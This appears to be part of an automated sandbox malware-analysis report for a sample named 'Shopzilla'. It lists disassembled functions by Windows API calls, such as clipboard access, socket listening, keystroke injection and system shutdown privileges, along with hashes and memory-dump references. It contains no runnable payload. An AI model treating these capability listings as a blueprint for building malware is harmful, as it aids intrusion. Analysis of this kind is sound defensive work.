                                              • Opcode Fuzzy Hash: 8877e881ad32e1b22d19a6880a2c4232eec2011fa5bdc42c157e1b43f79f101e
                                              • Instruction Fuzzy Hash: 1841FA305447CAAEFF3187A488047B5BFA06F11344F29805EDBE5571C2EBA45BC4CBAA
                                              APIs
                                              • __swprintf.LIBCMT ref: 00C042BE
                                              • __swprintf.LIBCMT ref: 00C042CB
                                                • Part of subcall function 00BC37FA: __woutput_l.LIBCMT ref: 00BC3853
                                              • FindResourceW.KERNEL32(?,?,0000000E), ref: 00C042F5
                                              • LoadResource.KERNEL32(?,00000000), ref: 00C04301
                                              • LockResource.KERNEL32(00000000), ref: 00C0430E
                                              • FindResourceW.KERNEL32(?,?,00000003), ref: 00C0432E
                                              • LoadResource.KERNEL32(?,00000000), ref: 00C04340
                                              • SizeofResource.KERNEL32(?,00000000), ref: 00C0434F
                                              • LockResource.KERNEL32(?), ref: 00C0435B
                                              • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 00C043BC
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                                              • String ID:
                                              • API String ID: 1433390588-0
                                              • Opcode ID: bbfd49b65e3a2c941521c7ecebf97b1e42b5e0bc292221438dccdee77eb75a37
                                              • Instruction ID: 71c498147d0874f373d2758d39ab90e5909ad4210e92fd43d86aee682b89b697
                                              • Opcode Fuzzy Hash: bbfd49b65e3a2c941521c7ecebf97b1e42b5e0bc292221438dccdee77eb75a37
                                              • Instruction Fuzzy Hash: 5531AFB260020AABCB199F61DD98FBF7BACFF04301F104559FA16D21A0D770DA21CBA4
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                              • String ID:
                                              • API String ID: 1737998785-0
                                              • Opcode ID: 7e0f4b43163f3b9add7ca8436080d6293a2736180baf71628271c32a47b04fd0
                                              • Instruction ID: 2b9ca05a1a0c8d6d3ed1a51d1441fb2b206c1b31d3bb973bd85f1edbe4b53bfd
                                              • Opcode Fuzzy Hash: 7e0f4b43163f3b9add7ca8436080d6293a2736180baf71628271c32a47b04fd0
                                              • Instruction Fuzzy Hash: 8921D6323112109FDB15AF24EC2AB6E77F8EF86725F118059FD469B2A1CB70AD41CB94
                                              APIs
                                                • Part of subcall function 00BB1A36: _memmove.LIBCMT ref: 00BB1A77
                                              • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 00C0F8F0
                                              • FindClose.KERNEL32(00000000), ref: 00C0FA03
                                                • Part of subcall function 00BA52B0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00BA52E6
                                              • Sleep.KERNEL32(0000000A), ref: 00C0F920
                                              • _wcscmp.LIBCMT ref: 00C0F934
                                              • _wcscmp.LIBCMT ref: 00C0F94F
                                              • FindNextFileW.KERNEL32(?,?), ref: 00C0F9ED
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: Find$File_wcscmp$CloseFirstMessageNextPeekSleep_memmove
                                              • String ID: *.*
                                              • API String ID: 2185952417-438819550
                                              • Opcode ID: 94caf3ba407b2f8f73434baa57ca7e465b4d5818f7fc7d8735dcacbc3cb63ca7
                                              • Instruction ID: 6bf762cb389124ad566aa9bad1481f12d48e90d27e3b9c219153c452ce23b85f
                                              • Opcode Fuzzy Hash: 94caf3ba407b2f8f73434baa57ca7e465b4d5818f7fc7d8735dcacbc3cb63ca7
                                              • Instruction Fuzzy Hash: 90417D7190021AAFDF24DF64CC59BEEBBB4FF05310F1445AAE815A32D1EB319A85CB90
                                              APIs
                                                • Part of subcall function 00BF917C: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00BF91C6
                                                • Part of subcall function 00BF917C: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00BF91F3
                                                • Part of subcall function 00BF917C: GetLastError.KERNEL32 ref: 00BF9200
                                              • ExitWindowsEx.USER32(?,00000000), ref: 00C05621
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                              • String ID: $@$SeShutdownPrivilege
                                              • API String ID: 2234035333-194228
                                              • Opcode ID: 4fd5ae9c568be2c5432eb427a554b8bd6bab2d5b63dd49c17159808c611c0316
                                              • Instruction ID: 585c84dda66427a8761ace4ca6cf4ae19da2b96dce4b31e17a61475b1499b617
                                              • Opcode Fuzzy Hash: 4fd5ae9c568be2c5432eb427a554b8bd6bab2d5b63dd49c17159808c611c0316
                                              • Instruction Fuzzy Hash: 5B0176316A4A156BF72866A88C4AFBF729CEB05341F600120FD27E22D2DAA35D00CD95
                                              APIs
                                              • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00C1678C
                                              • WSAGetLastError.WSOCK32(00000000), ref: 00C1679B
                                              • bind.WSOCK32(00000000,?,00000010), ref: 00C167B7
                                              • listen.WSOCK32(00000000,00000005), ref: 00C167C6
                                              • WSAGetLastError.WSOCK32(00000000), ref: 00C167E0
                                              • closesocket.WSOCK32(00000000,00000000), ref: 00C167F4
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: ErrorLast$bindclosesocketlistensocket
                                              • String ID:
                                              • API String ID: 1279440585-0
                                              • Opcode ID: 234864f96cf5b9b866a71da9071b9f21041cf34755fced14b1c419aa3995aba1
                                              • Instruction ID: 0df340d2dd1fcaec2e66e9882c4fb897fb566bd0f59a641ff0f6bf658362462b
                                              • Opcode Fuzzy Hash: 234864f96cf5b9b866a71da9071b9f21041cf34755fced14b1c419aa3995aba1
                                              • Instruction Fuzzy Hash: 8F21F331200604AFCB10EF64C895BBEB3E9EF46324F208598F966A73D1CB70AD41DB91
                                              APIs
                                                • Part of subcall function 00BA29E2: GetWindowLongW.USER32(?,000000EB), ref: 00BA29F3
                                              • DefDlgProcW.USER32(?,?,?,?,?), ref: 00BA1DD6
                                              • GetSysColor.USER32(0000000F), ref: 00BA1E2A
                                              • SetBkColor.GDI32(?,00000000), ref: 00BA1E3D
                                                • Part of subcall function 00BA166C: DefDlgProcW.USER32(?,00000020,?), ref: 00BA16B4
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: ColorProc$LongWindow
                                              • String ID:
                                              • API String ID: 3744519093-0
                                              • Opcode ID: 6dbeacde0b2968dcdfbe6b4eb946a1fb59971edbf236291f1c545f540cb2d30b
                                              • Instruction ID: 49052df0a5ad265d77873e46e91ba14011cc0319194b8cc2c58a56886bd8963a
                                              • Opcode Fuzzy Hash: 6dbeacde0b2968dcdfbe6b4eb946a1fb59971edbf236291f1c545f540cb2d30b
                                              • Instruction Fuzzy Hash: C3A1557411E404FAE67CAB2E9CC4E7F35DDEB43301F1509ABF482C62D1DA218C0192B6
                                              APIs
                                              • FindFirstFileW.KERNEL32(?,?), ref: 00C0C196
                                              • _wcscmp.LIBCMT ref: 00C0C1C6
                                              • _wcscmp.LIBCMT ref: 00C0C1DB
                                              • FindNextFileW.KERNEL32(00000000,?), ref: 00C0C1EC
                                              • FindClose.KERNEL32(00000000,00000001,00000000), ref: 00C0C21C
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: Find$File_wcscmp$CloseFirstNext
                                              • String ID:
                                              • API String ID: 2387731787-0
                                              • Opcode ID: 7fc5c78c4034a7ef9f33fad5d2b74bb14444b3da5e7b31489de63a7f95e70b05
                                              • Instruction ID: 125a160c2911f7e733400e3721e6ec458fedb79da4057f7d351681f47ef5725b
                                              • Opcode Fuzzy Hash: 7fc5c78c4034a7ef9f33fad5d2b74bb14444b3da5e7b31489de63a7f95e70b05
                                              • Instruction Fuzzy Hash: 24516B756046029FD714DFA8D4D0EAAB3E8FF49320F10466DF966877A1DB70AD04CB91
                                              APIs
                                                • Part of subcall function 00C1823D: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00C18268
                                              • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00C16C4E
                                              • WSAGetLastError.WSOCK32(00000000), ref: 00C16C77
                                              • bind.WSOCK32(00000000,?,00000010), ref: 00C16CB0
                                              • WSAGetLastError.WSOCK32(00000000), ref: 00C16CBD
                                              • closesocket.WSOCK32(00000000,00000000), ref: 00C16CD1
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: ErrorLast$bindclosesocketinet_addrsocket
                                              • String ID:
                                              • API String ID: 99427753-0
                                              • Opcode ID: 85a3ead8981a6cf65d5ce752d7e8752fbffda16713095e06e727f5abeaade47a
                                              • Instruction ID: d9043e361604377c8f948e6fde6ce9a4c07fa7422c83652b84868e1b28d2f0ee
                                              • Opcode Fuzzy Hash: 85a3ead8981a6cf65d5ce752d7e8752fbffda16713095e06e727f5abeaade47a
                                              • Instruction Fuzzy Hash: 5D41E775704210AFDB10AF649C96FBE73E8DF46710F048498F955AB3D2CBB0AD009B91
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                              • String ID:
                                              • API String ID: 292994002-0
                                              • Opcode ID: 6ab8681530f32ff69de41972ead8466ed5ab9be1bfa4b60aba009b762a488dc9
                                              • Instruction ID: 68b183a2dbf550fb6a8fe36d1af612f5916f0310021da1cc3dcb015526633039
                                              • Opcode Fuzzy Hash: 6ab8681530f32ff69de41972ead8466ed5ab9be1bfa4b60aba009b762a488dc9
                                              • Instruction Fuzzy Hash: B311C132750A219FE7215F26AC44B2FBB98FF85B61B144028F856D7641CB70ED018AE0
                                              APIs
                                              • LoadLibraryA.KERNEL32(kernel32.dll,?,00BE01AA,?), ref: 00C1C4AF
                                              • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00C1C4C1
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: AddressLibraryLoadProc
                                              • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                              • API String ID: 2574300362-1816364905
                                              • Opcode ID: aa1eaf71f469c348e097a72fd8c6879c7bbf5357669e338017568d60727e5594
                                              • Instruction ID: d3ede5959d79fac29fde1c83c18f1b405f7e8c620823776e21be6d81a6334fad
                                              • Opcode Fuzzy Hash: aa1eaf71f469c348e097a72fd8c6879c7bbf5357669e338017568d60727e5594
                                              • Instruction Fuzzy Hash: 0FE0C23B550B02CFE7204B26C869BBAB6D4BF16756B108479F89BC2220E770C8C0CB10
                                              APIs
                                              • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000), ref: 00C12891
                                              • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00C128C8
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: Internet$AvailableDataFileQueryRead
                                              • String ID:
                                              • API String ID: 599397726-0
                                              • Opcode ID: 43d954fab5e3a3a82e790fd494f0cccef1ef7f8f9e46408a6b5b918d0bcc8b37
                                              • Instruction ID: fd41ce7d686c5f062528e37161714c9bc6c7c351ce8ca9d9042737e0d1c2efdd
                                              • Opcode Fuzzy Hash: 43d954fab5e3a3a82e790fd494f0cccef1ef7f8f9e46408a6b5b918d0bcc8b37
                                              • Instruction Fuzzy Hash: C141D776504209BFEB20DA55CC85FFF77BCEB42724F10406EF601A6280D6719E91A6A0
                                              APIs
                                              • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00C040DE
                                              • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 00C0411F
                                              • CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00C0412A
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: CloseControlCreateDeviceFileHandle
                                              • String ID:
                                              • API String ID: 33631002-0
                                              • Opcode ID: 20b8b00b35d2040fad4eb87fad2c0178544aaf7aa84b86780f8498c4c8114f18
                                              • Instruction ID: 32f8830f19a220be84c95a15a5e3055baf8ecb9d8cf8bf9ad715b7044f37270d
                                              • Opcode Fuzzy Hash: 20b8b00b35d2040fad4eb87fad2c0178544aaf7aa84b86780f8498c4c8114f18
                                              • Instruction Fuzzy Hash: 381130B5E01228BBDB108F959C44FAFBBBCEB45B60F104155FA14E7290D6715A018BA1
                                              APIs
                                              • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00C04DB2
                                              • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00C04DC9
                                              • FreeSid.ADVAPI32(?), ref: 00C04DD9
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: AllocateCheckFreeInitializeMembershipToken
                                              • String ID:
                                              • API String ID: 3429775523-0
                                              • Opcode ID: e919cfb9e536b63acabe9d37eb3f184870be382f6b5fc3aae343ad6a2252cc17
                                              • Instruction ID: e4e380f3c2737d4694473ac27407e280dc819d737edc866aa1141835e7c7f65c
                                              • Opcode Fuzzy Hash: e919cfb9e536b63acabe9d37eb3f184870be382f6b5fc3aae343ad6a2252cc17
                                              • Instruction Fuzzy Hash: 99F04F7691130CBFDF04DFE0DC99FAEB7BCEF08201F1044A9A601E2180D7305A048B50
                                              APIs
                                              • mouse_event.USER32(00000800,00000000,00000000,00000088,00000000), ref: 00C050DB
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: mouse_event
                                              • String ID: DOWN
                                              • API String ID: 2434400541-711622031
                                              • Opcode ID: f5ea71aef98e70b8af6d905172db98149a9a4db752f7dc3d411d5b58805f6c73
                                              • Instruction ID: 639e20be150285e1e9ec1b1333b1ff01fdaafae8f5b1adcb0ca585442ec967a4
                                              • Opcode Fuzzy Hash: f5ea71aef98e70b8af6d905172db98149a9a4db752f7dc3d411d5b58805f6c73
                                              • Instruction Fuzzy Hash: 78E0863615CF217AFD6411247C16FBF038C8B12739B604156F814950D2E9C42DC599AD
                                              APIs
                                              • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00C0196D
                                              • keybd_event.USER32(?,75C0C0D0,?,00000000), ref: 00C01980
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: InputSendkeybd_event
                                              • String ID:
                                              • API String ID: 3536248340-0
                                              • Opcode ID: e3140a77955e7da55e8ce00eb0a0dd5b14e9fb981da61bfe7cf9d8a1fbd1ec58
                                              • Instruction ID: f157d806dd6c92e6f120dbb30e2808f266048971d68c223e4c711c605448e489
                                              • Opcode Fuzzy Hash: e3140a77955e7da55e8ce00eb0a0dd5b14e9fb981da61bfe7cf9d8a1fbd1ec58
                                              • Instruction Fuzzy Hash: 75F0447291420DABEB00CF95C806BFEBBB4EF08315F10804AFD55AA2A2C3798615DF94
                                              APIs
                                              • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,00C1991A,?,00C3098C,?), ref: 00C0A547
                                              • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,?,?,00C1991A,?,00C3098C,?), ref: 00C0A559
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: ErrorFormatLastMessage
                                              • String ID:
                                              • API String ID: 3479602957-0
                                              • Opcode ID: 80fe3a28ae9996b72a3ffbf3f2400d030eab824dcf8a656c6aea45a3651ae2c4
                                              • Instruction ID: ce3cb1484ef1b79f900eec50253ddbbb75cd39f76219c1166967a427fdab73ac
                                              • Opcode Fuzzy Hash: 80fe3a28ae9996b72a3ffbf3f2400d030eab824dcf8a656c6aea45a3651ae2c4
                                              • Instruction Fuzzy Hash: 2FF0E23111122DBBDB20AFA8CC48FEA77ACBF08361F008195B918D6180D6309A00CBA1
                                              APIs
                                              • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00BC8EB7,?,?,?,00000001), ref: 00BCA2BA
                                              • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 00BCA2C3
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: ExceptionFilterUnhandled
                                              • String ID:
                                              • API String ID: 3192549508-0
